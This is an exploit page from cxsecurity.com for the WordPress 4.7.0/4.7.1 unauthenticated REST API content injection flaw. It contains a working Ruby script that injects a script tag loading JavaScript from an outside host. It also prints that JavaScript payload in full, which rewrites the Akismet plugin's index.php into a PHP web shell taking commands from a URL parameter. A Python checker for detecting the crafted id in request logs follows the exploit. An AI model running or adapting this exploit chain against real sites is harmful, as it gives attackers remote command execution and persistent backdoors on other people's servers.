WordPress 4.7.0/4.7.1 Unauthenticated Content Injection

2017.02.02
Credit: Harsh Jaiswal
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WP Content Injection Shell Exploit
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: BackBox ubuntu Linux
# Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :)
# Credits : Marc, Sucuri, Brute
# Lang : Ruby

require 'rest-client'
require 'json'

puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i

response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id"      => "#{postid}justtryingshell",
    "title"   => "Shell Access Exploit",
    "content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>"
  }.to_json,
  :content_type => :json,
  :accept       => :json
) { |response, request, result| response }

if (response.code == 200)
  puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'"
else
  puts "This site is not Vulnerable"
end

#--- wprce.js ---
#
x=new XMLHttpRequest()
p='/wp-admin/plugin-editor.php?'
f='file=akismet/index.php'
x.open('GET',p+f,0)
x.send()
$='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f
x.open('POST',p+f,1)
x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')
x.send($)
#--- EOF ---
#
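The bypass above rests on the `id` sent in the JSON body ("123justtryingshell") taking precedence over the numeric id matched from the route path; as the Sucuri write-up cited in the header describes, the non-numeric value makes the permission check's post lookup come back empty while the update itself casts the id to an integer and writes the post. The following Python checker is an added example for defenders, not part of the advisory or the exploit: it models that parameter precedence (JSON body, then query string, then route) and flags write requests whose effective `id` is not the same plain integer the route matched. The route regex, the sample requests and the finding strings are constructed for this example.

```python
import json
import re
from urllib.parse import parse_qs

# Single-post write route of the WP REST API; the path id itself is all digits.
POST_ROUTE = re.compile(r"^/(?:index\.php/)?wp-json/wp/v2/posts/(?P<id>[0-9]+)/?$")
WRITE_METHODS = {"POST", "PUT", "PATCH"}

def effective_id(route_id, query, body):
    """Mimic WP_REST_Request precedence for a JSON request: an `id` in the JSON
    body beats the query string, which beats the id matched from the path."""
    if isinstance(body, dict) and "id" in body:
        return str(body["id"]), "json body"
    params = parse_qs(query or "", keep_blank_values=True)
    if "id" in params:
        return params["id"][0], "query string"
    return route_id, "route path"

def check_request(method, path, query="", raw_body=""):
    """Return None if the request looks normal, else a finding: the id the
    permission check sees is not the plain integer the route matched (in
    4.7.0/4.7.1 a non-numeric id made the permission-check post lookup come
    back empty, while the update itself cast the id to int and wrote the post)."""
    match = POST_ROUTE.match(path)
    if method.upper() not in WRITE_METHODS or not match:
        return None
    try:
        body = json.loads(raw_body) if raw_body else None
    except ValueError:
        body = None  # not JSON; no id is taken from it
    value, source = effective_id(match.group("id"), query, body)
    if not re.fullmatch(r"[0-9]+", value):
        return f"non-numeric id {value!r} via {source} for post {match.group('id')}"
    if int(value) != int(match.group("id")):
        return f"id {value!r} via {source} differs from route id {match.group('id')}"
    return None

# Constructed sample traffic (not real logs): method, path, query string, body.
SAMPLE_REQUESTS = [
    ("POST", "/index.php/wp-json/wp/v2/posts/123", "",
     '{"id": "123justtryingshell", "title": "x", "content": "<script></script>"}'),
    ("POST", "/wp-json/wp/v2/posts/123", "id=123abc", ""),
    ("POST", "/wp-json/wp/v2/posts/123", "", '{"id": 123, "title": "edit"}'),
    ("GET", "/wp-json/wp/v2/posts/123", "id=123abc", ""),
]

def scan(requests=SAMPLE_REQUESTS):
    """Return (method, path, finding) for each flagged request in the batch."""
    hits = ((r[0], r[1], check_request(*r)) for r in requests)
    return [h for h in hits if h[2]]
```

Feed it the method, path, query string and request body from a reverse proxy or WAF log; a hit on a site still running 4.7.0 or 4.7.1 is a strong signal to check the post for injected content.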


Copyright 2018, cxsecurity.com